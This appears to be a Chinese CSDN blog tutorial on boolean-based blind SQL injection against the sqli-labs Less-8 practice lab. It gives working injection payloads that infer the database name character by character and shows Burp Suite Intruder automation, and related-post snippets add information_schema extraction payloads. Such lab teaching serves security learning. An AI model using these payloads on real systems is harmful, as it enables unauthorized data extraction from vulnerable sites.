SQL注入之布尔盲注

最新推荐文章于 2024-04-09 10:02:21 发布
最新推荐文章于 2024-04-09 10:02:21 发布
阅读量399 收藏 1
点赞数
文章标签: SQL注入之布尔盲注 布尔盲注如何使用BP SQL如何使用BP
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45076423/article/details/103034012
版权
布尔盲注
如果确定页面注入点存在,如果页面没有回显并且没有报错信息可以考虑使用布尔盲注。
布尔盲注的判断条件是页面布尔类型状态。
当传递参数[?id=1' and 1=1 --+]

这里以sqlilab的闯关为例。
在这里插入图片描述
当传递参数[?id=1’ and 1=2 --+]
在这里插入图片描述
比较两次的传递的参数,页面明显存在差异(布尔类型状态)。
利用这个差异,我们可以一点一点得到数据库的内容。例如想要获取当前数据库的名字。
1. 判断数据库名字的长度
可以自己先猜测一下数据库的长度,假如猜想的数字是8,提交参数[?id=1’ and length(database()) = 8 --+],页面显示正常,就可以确定当前数据库名长度为8。如果页面不显示,可以用[?id=1’ and length(database()) > 8 --+] 或者 [?id=1’ and length(database()) < 8 --+] 来确定范围,再进一步的确定数据库长度。
在这里插入图片描述
2. 按位确定数据库名字
提交参数[?id=1’ and ord((substr(database(), 1, 1)))=115 --+],页面显示正常,可以确定当前数据库名的第一位字母的ASCII 码值为115,那就是字母[s]。
http://192.168.177.134/sql/Less-8/
?id=1’ and (substr(database(),1,1))=‘s’–+
在这里插入图片描述
按照这种方法我们可以确定数据库名第二个字母的ascii 值,语句如[?id=1’ and ord((substr(database(), 2, 1)))>0 --+],依次确定数据库的字母。

但是这样做太耗费时间了,所以我们可以利用一下burpsuite.

启动BP,开启浏览器代理

第一步:确定数据库为几位 在这里插入图片描述在这里插入图片描述在这里插入图片描述发送到intruder模块
在这里插入图片描述在这里插入图片描述在这里插入图片描述第二步:确定数据库的具体字母
提交的SQL语句:http://192.168.177.134/sql/Less-8/
?id=1’ and (substr(database(),1,1))=‘s’–+
使用BP抓包
在这里插入图片描述在这里插入图片描述在这里插入图片描述选择 start attack 开始执行。
在这里插入图片描述爆出数据库名:security。

night.x
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
sql布尔盲注
2203_75336412的博客
08-12 224
id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))>100--+页面返回有数据。id=1' and (ascii(substr(( select id users limit 0,1),1,1)))>30--+页面返回有数据。id=1' and 1=1 --+ 页面有返回?通过这个方法判断出整个数据库名。
SQL注入(四):盲注布尔)+盲注(时间)+宽字节+load_file
NSQ0207的博客
07-19 225
盲注布尔+时间 宽字节:使用%df load_file使用
sql注入布尔盲注
weixin_45653478的博客
04-09 1369
id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' limit 1,1),1,1)))=117 --+ 爆的i。例如:substr(abcd,1,1) 从第一位开始(也就是从a开始)截取一个字符,就是a。substr(abcd,2,1) 从第二位开始,截取一个字符,就是b。抓包并发送intruder。设置多个payload集合。
SQL布尔盲注 (Blind)基本原理及使用burpsuite进行暴力猜解
Welcome To Myon'Blog !
12-22 1920
SQL布尔盲注入是一种SQL注入攻击方式, 根据某个条件是否成立,来判断返回结果的真假,通过布尔盲注,攻击者可以逐个字符地推断出数据库中存储的信息,如用户名、密码等,从而获取敏感信息或者执行非法操作。什么情况下我们会采用盲注?我们平时最常用的是union联合查询注入,这是基于页面有数据回显的条件;但是,如果无论你输入什么,页面始终都只回显两种情况,我们可以把这两种情况看成是1或者0,也就是说,要么你查的东西有,要么不存在。面对这种只回显两种情况的,我们一般是采用盲注盲注可以分为时间延迟盲注布尔盲注
sql注入知识---布尔盲注
尘玥的故事
04-08 530
一般的情况下我们面对这种盲注都是写脚本跑(提前准备然后更具具体的情况再改脚本)表现:会对你的输出进行显示正确错误,但不会报错。通过返回的正确与否来判断数据库的每个字母。
sql盲注_布尔盲注
sugar_by的博客
06-02 445
盲注:页面没有报错回显,不知道数据库具体返回值的情况下,对数据库中的内容进行猜解,实行sql注入 盲注分类:布尔盲注、时间盲注、报错盲注 布尔注入:web页面只返回true真,false假俩种类型。利用页面返回不同,逐个猜解数据 查询命令可以执行但是不会返回,使用ascii()函数把字符转变为ascii表对应的数字 substr((),)函数,substr((batabase()),1,1) substr(数据库/字符串,输出第一个字符,一次输出一个字符) 猜第一个是那个字符 说明第一个字符就在
SQL注入之基于布尔盲注详解
09-10
首先说明的盲注注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入盲注一般分为布尔盲注和基于时间的盲注。这篇文章主要讲解的是基于布尔盲注。下面来一起看看吧。
布尔盲注.py_sql盲注python_
10-03
布尔盲注(Boolean-Based Blind Injection)是SQL注入攻击的一种类型,攻击者通过发送精心构造的查询,观察系统响应是否变化来判断数据库中的信息。在这个场景中,我们关注的是一个名为"布尔盲注.py"的Python脚本,...
超级SQL注入工具,支持布尔盲注,报错盲注,union注入
03-27
超级SQL注入工具目前支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 超级SQL注入工具采用C#开发,底层采用Socket发包进行HTTP交互,极大的提升了发包效率,...
布尔盲注python3范本模板
01-16
布尔盲注python3范本模板
布尔盲注python脚本.zip
12-28
布尔盲注(Boolean-Based Blind Injection)是一种常见的SQL注入攻击方式,它主要针对那些不返回完整查询结果或不显示任何错误信息的Web应用程序。在这种类型的注入中,攻击者通过观察服务器响应时间或状态来判断SQL...
渗透测试-SQL注入布尔盲注和时间盲注
lza20001103的博客
04-20 2800
渗透测试-SQL注入布尔盲注和时间盲注
SQL 注入漏洞(六)布尔盲注
不秃头的程序Yang
06-11 1107
二、判断盲注
BurpSuit官方实验室之SQL注入
tpaer的博客
11-13 5301
BurpSuit官方实验室靶场-SQL注入通关记录。
SQL布尔盲注思路分析(入门必看)
Pz_mstr's Blog
08-18 7190
不知道,不清楚sql盲注?这里有你想要的
5.布尔盲注
kinght的博客
08-26 536
title: 5.布尔盲注 date: 2020-07-30 17:24:00 categories: 4.网络安全 1.Web安全 1.SQL注入 tags: 1.Web安全 2.SQL注入注入我们已经有了简单的概念,然而,就是在sql注入过程中,某些sql语句的执行结果被程序限制不回显到前端,这时候我们只能用一些别的方法进行判断或者尝试,这个判断或尝试过程就叫盲注。 什么是布尔盲注 布尔判断真假,那么布尔盲注就是通过判断真假的方式来判断或尝试的注入攻击 <?php error_re.
sql注入学习笔记(三)布尔盲注
w17691058648x的博客
03-13 1067
布尔盲注是由于页面提交数据在与数据交互是完全没有在页面上出现回显数据,只会出现数据提交正确和错误俩种不同页面(报错型至少语法错误会回显错误在页面上)或者无法使用联合查询。 例如:一个人不说话,如果你说对了他就点头,如果你说错了他就摇头。理解以下场景: 菜鸟:“大佬,你是不姓张?” 不说话的大佬:摇头ing 菜鸟:“我知道了,大佬你姓王是不是?” 不说话的大佬:欣慰的点头ing...
布尔盲注详解
热门推荐
AaronLuo
08-27 1万+
布尔盲注 布尔盲注一般适用于页面没有回显字段(不支持联合查询),且web页面返回True 或者 false,构造SQL语句,利用and,or等关键字来其后的语句 true 、 false使web页面返回true或者false,从而达到注入的目的来获取信息 ascii() 函数,返回字符ascii码值 参数 : str单字符 length() 函数,返回字符串的长度 参数 : str 字...
java过滤请求参数中的非法字符,防止XSS攻击、SQL盲注
02-14 1万+
过滤请求参数中的非法字符,防止XSS攻击、SQL盲注
sql注入布尔盲注流程
最新发布
06-28
SQL注入布尔盲注是一种利用SQL注入技术来检测查询结果是否满足某个条件的攻击方法,它通常在应用程序中用于验证用户输入时使用。以下是SQL注入布尔盲注的基本流程: 1. **识别可注入点**:攻击者首先尝试找出页面上...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

night.x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值